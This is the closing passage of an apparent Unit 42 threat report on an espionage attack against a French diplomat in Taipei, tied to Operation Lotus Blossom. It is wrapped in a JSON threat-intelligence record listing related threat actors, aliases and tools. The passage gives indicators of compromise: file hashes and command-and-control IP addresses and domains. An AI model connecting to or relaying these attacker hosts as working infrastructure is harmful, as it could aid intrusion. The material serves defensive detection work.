5.3.\r\nThe Emissary Trojan is related to the Elise malware used in Operation Lotus Blossom, which was an attack\r\ncampaign on targets in Southeast Asia, in many cases also with official looking decoy documents that do not\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 15 of 16\n\nappear to have been available online. Additionally, the targeting of a French diplomat based in Taipei, Taiwan\r\naligns with previous targeting by these actors, as does the separate infrastructure. Based on the targeting and lures,\r\nUnit 42 assesses that the threat actors’ collection requirements not only include militaries and government\r\nagencies in Southeast Asia, but also nations involved in diplomatic and trade agreements with them.\r\nIndicators\r\nRelated Hashes\r\n748feae269d561d80563eae551ef7bfd -書面報名表格.doc\r\n9fd6f702763a9840bd1b3a898eb9c62d -蔡英文柯建銘全國科技後援會邀請函.doc\r\n06f1d2be5e981dee056c231d184db908 - ishelp.dll\r\n6278fc8c7bf14514353797b229d562e8 - A08E81B411.DAT\r\ne9f51a4e835929e513c3f30299567abc - 75BD50EC.DAT\r\nCommand and Control\r\n203.124.14.229\r\nustar5.PassAs[.]us\r\nappletree.onthenetas[.]com\r\ndnt5b.myfw[.]us\r\nRelated Articles\r\nThreat Brief: Recruiting Scheme Impersonating Palo Alto Networks Talent Acquisition Team\r\nBoggy Serpens Threat Assessment\r\nRecent Jailbreaks Demonstrate Emerging Threat to DeepSeek\r\nEnlarged Image\r\nSource: https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nhttps://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" ], "report_names": [ "attack-on-french-diplomat-linked-to-operation-lotus-blossom" ], "threat_actors": [ { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "cfdd35af-bd12-4c03-8737-08fca638346d", "created_at": "2022-10-25T16:07:24.165595Z", "updated_at": "2026-04-10T02:00:04.887031Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Cosmic Wolf", "Marbled Dust", "Silicon", "Teal Kurma", "UNC1326" ], "source_name": "ETDA:Sea Turtle", "tools": [ "Drupalgeddon" ], "source_id": "ETDA", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2fa14cf4-969f-48bc-b68e-a8e7eedc6e98", "created_at": "2022-10-25T15:50:23.538608Z", "updated_at": "2026-04-10T02:00:05.378092Z", "deleted_at": null, "main_name": "Lotus Blossom", "aliases": [ "Lotus Blossom", "DRAGONFISH", "Spring Dragon", "RADIUM", "Raspberry Typhoon", "Bilbug", "Thrip" ], "source_name": "MITRE:Lotus Blossom", "tools": [ "AdFind", "Impacket", "Elise", "Hannotog", "NBTscan", "Sagerunex", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "33ae2a40-02cd-4dba-8461-d0a50e75578b", "created_at": "2023-01-06T13:46:38.947314Z", "updated_at": "2026-04-10T02:00:03.155091Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "UNC1326", "COSMIC WOLF", "Marbled Dust", "SILICON", "Teal Kurma" ], "source_name": "MISPGALAXY:Sea Turtle", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "c21da9ce-944f-4a37-8ce3-71a0f738af80", "created_at": "2025-08-07T02:03:24.586257Z", "updated_at": "2026-04-10T02:00:03.804264Z", "deleted_at": null, "main_name": "BRONZE ELGIN", "aliases": [ "CTG-8171 ", "Lotus Blossom ", "Lotus Panda ", "Lstudio", "Spring Dragon " ], "source_name": "Secureworks:BRONZE ELGIN", "tools": [ "Chrysalis", "Cobalt Strike", "Elise", "Emissary Trojan", "Lzari", "Meterpreter" ], "source_id": "Secureworks", "reports": null }, { "id": "62b1b01f-168d-42db-afa1-29d794abc25f", "created_at": "2025-04-23T02:00:55.22426Z", "updated_at": "2026-04-10T02:00:05.358041Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Sea Turtle", "Teal Kurma", "Marbled Dust", "Cosmic Wolf", "SILICON" ], "source_name": "MITRE:Sea Turtle", "tools": [ "SnappyTCP" ], "source_id": "MITRE", "reports": null }, { "id": "87a20b72-ab72-402f-9013-c746c8458b0b", "created_at": "2023-01-06T13:46:38.293223Z", "updated_at": "2026-04-10T02:00:02.915184Z", "deleted_at": null, "main_name": "LOTUS PANDA", "aliases": [ "Red Salamander", "Lotus BLossom", "Billbug", "Spring Dragon", "ST Group", "BRONZE ELGIN", "ATK1", "G0030", "Lotus Blossom", "DRAGONFISH" ], "source_name": "MISPGALAXY:LOTUS PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "eaa8168f-3fab-4831-aa60-5956f673e6b3", "created_at": "2022-10-25T16:07:23.805824Z", "updated_at": "2026-04-10T02:00:04.754761Z", "deleted_at": null, "main_name": "Lotus Blossom", "aliases": [ "ATK 1", "ATK 78", "Billbug", "Bronze Elgin", "CTG-8171", "Dragonfish", "G0030", "G0076", "Lotus Blossom", "Operation Lotus Blossom", "Red Salamander", "Spring Dragon", "Thrip" ], "source_name": "ETDA:Lotus Blossom", "tools": [ "BKDR_ESILE", "Catchamas", "EVILNEST", "Elise", "Group Policy Results Tool", "Hannotog", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "PsExec", "Rikamanu", "Sagerunex", "Spedear", "Syndicasec", "WMI Ghost", "Wimmie", "gpresult" ], "source_id": "ETDA", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434551, "ts_updated_at": 1775792067, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8c24226faacc952e606ef9d3fdda0216f13b9f5b.pdf", "text": "https://archive.orkl.eu/8c24226faacc952e606ef9d3fdda0216f13b9f5b.txt", "img": "https://archive.orkl.eu/8c24226faacc952e606ef9d3fdda0216f13b9f5b.jpg" } }